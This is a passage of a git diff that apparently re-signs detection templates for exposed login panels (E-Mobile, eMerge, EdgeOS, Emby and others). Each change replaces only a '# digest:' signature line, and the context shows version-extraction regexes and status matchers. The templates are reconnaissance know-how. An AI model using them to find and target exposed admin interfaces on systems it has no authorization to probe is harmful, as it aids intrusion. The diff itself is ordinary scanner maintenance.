4b0a00483046022100cb11cfe9200ab3c8e94d354c6cde46b664f689beecd15438c3e4f17e43374dd8022100fe1acb9b15e4c7a1fa788e7dbc48a66a6bd701bf2b68e18adde15842b6c90db2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/e-mobile-panel.yaml b/http/exposed-panels/e-mobile-panel.yaml index 6d2d6f80cc..94458dafb8 100644 --- a/http/exposed-panels/e-mobile-panel.yaml +++ b/http/exposed-panels/e-mobile-panel.yaml @@ -42,4 +42,4 @@ http: group: 1 regex: - 'E-Mobile ([0-9.]+)' -# digest: 4a0a004730450220599a70a5aff401b58e64cf860b49ffb239612df8095a17f20e8d458e888f6d09022100ee2dda6d825ac7c63fbc6f8755aa31b1457a5fdad9f57e5a27f2798031f87105:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100aa885928d69f48a7b882e431890f950f61523757f0861862db63ca92f2cf2b6d022100da46abadbe7dccf260371baa3ef481acda21cb2ee306ec7bfd957c4328cc6446:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eMerge-panel.yaml b/http/exposed-panels/eMerge-panel.yaml index 0be5836a6c..2691ddcbaf 100644 --- a/http/exposed-panels/eMerge-panel.yaml +++ b/http/exposed-panels/eMerge-panel.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202741494f2b90dd4279180d8809c9d606c2f428ec5c485afb56b2c9743909949002205639cc8d8c825670a1fdf09df8086b67c454fcd7bc6dd0dd27d97fb0439e093a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d102c7378a649fa622bc08356dbe7087cd7354d66b554576f8f700a076d5abbf022078e0fd4cb7b807be7ce5fd82ff99e0660e45dd250e3c0796241b509d459da907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/earcu-panel.yaml b/http/exposed-panels/earcu-panel.yaml index 0190ef18de..b188bf8f4f 100644 --- a/http/exposed-panels/earcu-panel.yaml +++ b/http/exposed-panels/earcu-panel.yaml @@ -38,4 +38,4 @@ http: group: 1 regex: - '(?:eav=)([0-9]+\.[0-9]+)' -# digest: 490a004630440220174ced87f9e2e953edbe5e5f8bf0fe0aba31579dd70671ff716ec6258ee8b3cb022060115e6470a9dd9d3e78fb6ea609445b9c3cb1676796baad1f7d5714dc3eefc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100929c459389eac91150fe7870074397b36842fc14e4e933f2238ded85b643766b02201fa87d1d47042c35836070a8e8e7c128890fe77d1a4d44be031af91bb7573ffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/easyjob-panel.yaml b/http/exposed-panels/easyjob-panel.yaml index 02d9c08d2a..7825fb725a 100644 --- a/http/exposed-panels/easyjob-panel.yaml +++ b/http/exposed-panels/easyjob-panel.yaml @@ -32,4 +32,4 @@ http: group: 1 regex: - 'easyJOB\s+([0-9.]+)' -# digest: 4b0a00483046022100983db9c387a5612277a7b250c8c8f0ffb74961f618b76ac21d4356615a5f5ef2022100aba93e494fa559c7410095129601d88d8712687ca1649b5335ef8d067143e661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204ac1dbd6e9f346a5dec6e8654a7250bf43e78090f6a5935f79406627cb25e5db02203c3aa2293541b17ce6453a09710a0830c6e1ec58e73249d8d4fcf548585965c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/easyvista-panel.yaml b/http/exposed-panels/easyvista-panel.yaml index 5dd53b1e1e..fb60e04b8b 100644 --- a/http/exposed-panels/easyvista-panel.yaml +++ b/http/exposed-panels/easyvista-panel.yaml @@ -33,4 +33,4 @@ http: regex: - '(?i)package:\s+"([a-z0-9._-]+)"' - '(?i)version : ([a-z0-9._-]+)' -# digest: 4a0a0047304502202e940a0d921638b03da755b8b6961674e2218da0b375b10c31c34de9181b8c7f022100fb7c93a0c82f313e5ace2cca365dc8d7b6c769efd178287dfd89795b47505360:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d3dc30104b4c0d61c1431836cdf8c44423dc34f21c5b2aea898f6e7360ed7c9a022017b7cf2294fabeca4f157ad0afffe0dbdc01aee8dc06c1436588fa2099622997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eclipse-birt-panel.yaml b/http/exposed-panels/eclipse-birt-panel.yaml index 8663563562..0d711e9a26 100644 --- a/http/exposed-panels/eclipse-birt-panel.yaml +++ b/http/exposed-panels/eclipse-birt-panel.yaml @@ -46,4 +46,4 @@ http: group: 1 regex: - 'Viewer Version : ([0-9.-]+)' -# digest: 4a0a0047304502206245bc78ee75415dfd659cfe848aeffb147c107c515c672794a3d32d3ed066a702210089b4aff343e511b47a04ddfb558b1d2d911a5665bffe7775d3bd10587059c5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bac974de8aad2121a7c20001a98a4529efc8403fa35c7a8a467f2fd31f58d2a9022100f7e3c06ec40a41ff7cfce14520a7d36e5f1f2bd8563da22b83e07e9b04ccbe9b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/edgeos-login.yaml b/http/exposed-panels/edgeos-login.yaml index e6d807d9f4..730723816c 100644 --- a/http/exposed-panels/edgeos-login.yaml +++ b/http/exposed-panels/edgeos-login.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a33af4c1bb592006a260d6d4a3ac60d3222998793ee30fa2aa39b43853d2be12022100be33543d473a95d3306ba3a5d7f0cbe69b45b3fae141b9900e392c0bc6e6e350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b5b5752ba3ea6c7e5630826c75ca0b2c39d70f0104991aed9910bc43918dbc91022100f95d8cf0794ea190ce7cc5d03978e5a80844f85e5d1346ee32a6b628da34339f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/efak-login-panel.yaml b/http/exposed-panels/efak-login-panel.yaml index d36186bfed..a1e8043326 100644 --- a/http/exposed-panels/efak-login-panel.yaml +++ b/http/exposed-panels/efak-login-panel.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c4a42108e1e4c469df96719d713da2d98a4b608798f3b1dfcffd9e1af86ff89d02201b9bac160ab721dd5a181bec4d33736163a17e9bc8ce0f473595a5470a0d2415:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b48ab7c62687c34edbc3d48d8a6a6b237f964710ea5b2ede5e230b199c70a1e60221008c4b819c96af52beae7acc8ad850d91a1c3a37856159e9552544acc0990d7809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eko-management-console-login.yaml b/http/exposed-panels/eko-management-console-login.yaml index f6824f19a1..b2985b2765 100644 --- a/http/exposed-panels/eko-management-console-login.yaml +++ b/http/exposed-panels/eko-management-console-login.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a38bb1641b94ba5a56768b6a10431b61484c5dcd22456026598e41b492f158b022100a6c5ae8431ad4a805c226687f4ec1ebe3c871a1dd5d671555c742e262af68ec8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a64c9152ae2032af7e11ad9c615e79d06ff1089a1f60416f8f8780815fabaf390221009bca26ec2c0748b0edad595f8c3591a32b319e1ac7bcc95d5e48f71d4b6b42ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/eko-software-update-panel.yaml b/http/exposed-panels/eko-software-update-panel.yaml index d07a8e776e..6c52165c55 100644 --- a/http/exposed-panels/eko-software-update-panel.yaml +++ b/http/exposed-panels/eko-software-update-panel.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a3c8e9235a6512497eac490474b395f7545f3f1980d03f9e7ec3184ef02175a80220166c94ea9ec61e98967c08c62827617ac076dd6c95148f59713e458d6f3a7f1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a70410d5ca2790a06ac1810c934b1fac4e3876ec33d16e6bb434a2baff0060db02202222125ba9bc9ad0ef94a0be444aa02199f062363a61ee165aa8a6da4df86518:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/elemiz-network-manager.yaml b/http/exposed-panels/elemiz-network-manager.yaml index 77831f8192..ab6c1154ec 100644 --- a/http/exposed-panels/elemiz-network-manager.yaml +++ b/http/exposed-panels/elemiz-network-manager.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dbbc8300fad3e74373b57ffe713c3c8b6f6e9a798c25807e83610fe73dc373100221008ffe951dd17ba7929030344061e25d0667316fff18f852dfdd07a661c03c0660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ff7e2e092b0f60b91803dd48193ea1eda94c01e893d7666c5602ae9016d52c820220654e6382fcf83ece7e83b09afbfc499296c406e9884bdbc84393f8b91c266bfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/emby-panel.yaml b/http/exposed-panels/emby-panel.yaml index 692abf556c..8aa592eb42 100644 --- a/http/exposed-panels/emby-panel.yaml +++ b/http/exposed-panels/emby-panel.yaml @@ -48,4 +48,4 @@ http: group: 1 regex: - '